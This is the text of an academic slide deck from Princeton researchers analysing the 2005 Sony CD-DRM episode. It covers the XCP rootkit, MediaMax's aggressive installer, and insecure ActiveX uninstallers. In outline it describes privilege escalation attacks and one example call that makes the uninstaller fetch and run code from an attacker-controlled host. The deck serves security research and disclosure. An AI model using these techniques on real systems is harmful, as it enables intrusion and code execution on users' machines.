390 likes | 740 Views
Lessons from the Sony CD-DRM Episode. J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University. The “Episode” - Fall 2005. World’s second largest music company Major anti-piracy plan, gone badly awry
E N D
Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University
The “Episode” - Fall 2005 • World’s second largest music company • Major anti-piracy plan, gone badly awry • Millions of copies of dangerous software • Hundreds of thousands of PCs at risk • International protests, class-action suits • Multi-million dollar recall, settlements • Changed perceptions of DRM—showed can be a security threat
First4Internet SunnComm “Light years beyond encryption™” 52 titles4.7 million discs 37 titles20 million discs
Research in the Blogosphere 27 blog posts,100’s of comments Rapid collaboration with researchers (and amateurs) around the world Paper sections posted online while writing
Our Contributions • XCP rootkit privilege escalation attack • XCP and MediaMax uninstaller remote exploits • MM patch triggers the attack it purports to fix • MM spyware-like behaviors • MM watermark technology analysis and attacks • Analysis and holes in active and passive CD DRM • XCP contains GPL code to work with iPod DRM • Analysis of CD DRM security problems in the broader context of computer security
CD DRM Computers CD Players Restricted use e.g. Can’t copy disc Can’t rip as MP3 Can’t use on iPod Plays normally
How CD DRM Works First time a protected CD isinserted… • Autorun (normal Windows feature) executes installer from the CD • Installs active protection driver, between CD driver and apps • Driver remains on system Ripper/copier Application Drivers OS Protection driver
Ripper/copier Application Ripper/copier Application Protection driver Protection driver Drivers Drivers OS OS CD markedas protected Normal CD # How CD DRM Works User tries to rip or copy a disc… • Protection driver checks for watermark • If found, blocks access to audio
Taxonomy of Attacks • Prevent installation • Shift key • Magic marker • Non-Windows OS • Interfere with watermark detection • Disable or remove protection software
DRM Challenges Bad Behavior DRM weaknesses prompted vendors to resort to dangerous/unethical techniques that jeopardized user security • XCP rootkit • MM aggressive installation • XCP and MM ActiveX-based uninstallers
The XCP Rootkit DRM challenge:Users will remove active protection XCP’s response:Install a rootkit to conceal the software
XCP Rootkit: Discovery Mark RussinovichOctober 31, 2005
XCP Rootkit: Operation Magic prefix: $sys$ Files Processes Registry keys Hidden
XCP Rootkit: Problems Local privilege escalation • Hidden objects not limited to XCP software • Malware ran by non-privileged users can’t install own rootkit, but can utilize XCP’s • Use to hide from virus checkers, admin tools Exploits in wild Backdoor.Ryknos.B Trojan.Welomoch
“Most people, I think, don't even know what a Rootkit is, so why should they care about it?”— Thomas Hesse President, Sony BMG Global Digital Business “It’s very important to remember that it’s your intellectual property — it’s not your computer. And in the pursuit of protection of intellectual property, it’s important not to defeat or undermine the security measures that people need to adopt in these days.” — Stewart BakerAsst. U.S. Secretary of Homeland Security
MediaMax Aggressive Installer DRM challenge:Users will decline to install protection software MM’s response:Install aggressively, regardless of consent
MediaMax Installation 13+ MB installed before EULA screen Commonly, active protection permanently activated even if EULA declined
MediaMax Installation: Problem Jesse Burns and Alex StamosDecember 6, 2005 Everyone — Full Control
MediaMax Installation: Attack • Attacker prepares booby-trapped MediaMax.dll, malicious code in DllMain() function • Non-privileged user replaces installed file with attack version • Privileged user inserts CD • Even before displaying a EULA, software on CD calls MediaMax.dll code to check version • Attack code runs with privileges
Aggression Exacerbates Repairs • Permissions reset to non-secure state whenever disc inserted. • Sony releases patch… …but, the patch calls code in MediaMax.dll. If already booby-trapped, will set off attack code. • How do users know they need to patch? Vulnerable even if have refused installation.
XCP and MediaMax Uninstallers DRM challenge:Angry customers demand to uninstall protection software XCP and MM response:Offer uninstallers, but use online design to limit access
XCP Uninstaller: Step 2 Wait for email (hours)
XCP Uninstaller: Step 4 Wait for second email (several days)
XCP Uninstaller: Step 5 Finally, visit web page and run uninstaller* * But if you insert the CD again, go back to step 1!
XCP Uninstaller: Operation • ActiveX control will accept arbitrary URL • Code from that URL is not authenticated • Control is not removed after use 1. XCP Uninstall web page: CodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”) 2. Client CodeSupport.ocx “HTTP GET /XCP.dat” Server sony-bmg.com XCP.dat Client extracts InstallLite.dll from XCP.dat, calls function UnInstall_xcp 3. Problems:
XCP Uninstaller: Attack 1. Attacker constructs Evil.dat Creates InstallLite.dll and puts attack code in UninstallXCP function 2. Victim visits attacker’s web page: CodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”) 3. Client CodeSupport.ocx “HTTP GET /Evil.dat” Server attacker.com Evil.dat Client extracts InstallLite.dll from Evil.dat, calls function UnInstallXCP Attack code runs with local user’s privileges. 4.
MediaMax Uninstaller “Oops! ... I did it again”
MediaMax Uninstaller 1. MediaMax Uninstall web page: AxWebRemove.Remove(3984-9201-0039-2257, “http://www.sunncomm.com/validate.asp”) 2. Client AxWebRemove.ocx “GET /validate.asp?key=3984-…” Server sunncomm.com “http://sunncomm.com/webrem.dll” 3. Client AxWebRemove.ocx “GET /webrem.dll” Server sunncomm.com WebRem.dll Client calls function ECF7() from WebRem.dll 4.
Aftermath XCP discs recalled; MediaMax halted …but still in many stores and CD collections Major class-action suits settled Customers can trade discs for cash, MP3 downloads, and non-DRM versions Sony won’t use CD DRM, for now
Takeaway Lessons • Aggressive DRM can have dangerous consequences: harm to user security • Effective DRM may require undermining the user’s control…and thus ability to defend against security threats • Look for similar problems in the future
The Stakes are High Bad DRM can… Harm users Create major liability for content owners Reduce sales for artists Ultimately, reduce incentives to create
Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University www.freedom-to-tinker.com
Chronology 31 Oct. 3 Nov. 10 Oct. 31 Rootkit revealed Nov. 3 Sony releases XCP patch 10 First suits filed against Sony 14 XCP patch/uninstaller hole 15 Sony recalls XCP discs 17 MediaMax uninstaller hole Dec. 6 MediaMax player hole 7 Hole in patch for MediaMax player hole 30 First suits settled 14 15 17 6 Dec. 7 30
XCP Rootkit: Operation Normal Windows system call(List files in a directory) Application KeQueryDirectoryFile(…); Windows Kernel KeServiceDescriptorTable 0x8060bb9c: int KeQueryDirectoryFile(…) { … }
XCP Rootkit: Operation Rootkit (Aries.sys) Application 0xf967bfa: KeQueryDirectoryFile(…); int Rootkit_QueryDirectoryFile(…) { … if filename begins with “$sys$”: remove from results Windows Kernel KeServiceDescriptorTable 0x8060bb9c: int KeQueryDirectoryFile(…) { … }
Constructing Evil.dat • Archive files protected with proprietary CRC • Prepare Evil.dat with random CRC • Run with breakpoint at line 2 • Take computed CRC and place in Evil.dat • ActiveX control: • C = ComputeCRC(<compressed data>) • If C != Header.CRC then Terminate • Extract and execute file Header: Name=“UninstallXCP.dat”CRC=0x03cb1a88 <compressed data> Lesson: Use a digital signature!
CD DRM as Spyware Both XCP and MediaMax: • “Phone home” about each title played despite privacy statement to the contrary • Ship without a meaningful uninstaller • Install without consent or exceed consent Spyware is hard to define, but these meet most common definitions.